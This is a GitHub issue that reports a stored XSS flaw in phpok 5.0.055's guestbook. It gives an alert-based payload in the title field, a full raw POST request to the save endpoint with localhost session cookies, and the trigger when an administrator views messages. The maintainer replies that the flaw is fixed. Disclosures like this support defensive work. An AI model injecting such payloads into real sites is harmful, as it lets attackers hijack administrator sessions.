Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

phpok 5.0.055 Store XSS vulnerability that can get the administrator cookie #3

Closed
Drea1v1 opened this issue Dec 8, 2018 · 1 comment

Comments

@Drea1v1
Copy link

Drea1v1 commented Dec 8, 2018

Visit the url:http://localhost/index.php?id=book

Step 1

Input Xss payload in the title parameter,such as <img src=x onerror=alert(document.cookie)>
image

POST /api.php?c=post&f=save HTTP/1.1
Host: localhost
Content-Length: 134
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/index.php?id=book
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_45afd0d5e0ac79310647ac6bc5b5e084=1540478711; UM_distinctid=1677dc16b8434a-05960abb8ab529-6313363-144000-1677dc16b866e; CNZZDATA1707573=cnzz_eid%3D1882766006-1544003086-http%253A%252F%252Flocalhost%252F%26ntime%3D1544024206; admin_auth=eyJpdiI6InZNKzdDV2E1cThadUxrcXZuakszeUE9PSIsInZhbHVlIjoiUVZmcmhkb3dSZDg3bk9YT3ViTmRFSWZUSWgwWVdLSjY5NUl3Wit6RWp5RGhpUHJib0RuaTMxc0N6UU1naXcrTnRHQmJOdnFkSTRXU0tHdDliRFZ4UkJSTkZuaFp4d1BYOTA1Z1ZKSkRINW5tQmo4TkdESERjbHdSQzJQQXlmMTEiLCJtYWMiOiJkMTljYjE1YWMwOWU4ODIzN2I5YTQ1ZjNlNjcwYzdiMDJiMWIyY2U5MmQ1MmFjOWJjYzE4Nzc3OTI2YmE1MmI3In0%3D; XDEBUG_SESSION=PHPSTORM; PHPSESSID=dngti2qdtfhmektapbh7c7et11; PHPSESSION=68qgk06qt2heoci271977dqut1
Connection: close

id=book&title=%3Cimg+src%3Dx+onrror%3Dalert(1)%3E&fullname=test&email=1%40qq.com&pic=&file=&_chkcode=4083&content=%3Cp%3E111%3C%2Fp%3E

Step 2

When the administrator logs in and moves the mouse over to view message information,it will trigger the payload.
image
image
image

@qinggan
Copy link
Owner

qinggan commented Feb 8, 2019

收到,已修正!

@qinggan qinggan closed this as completed Apr 28, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants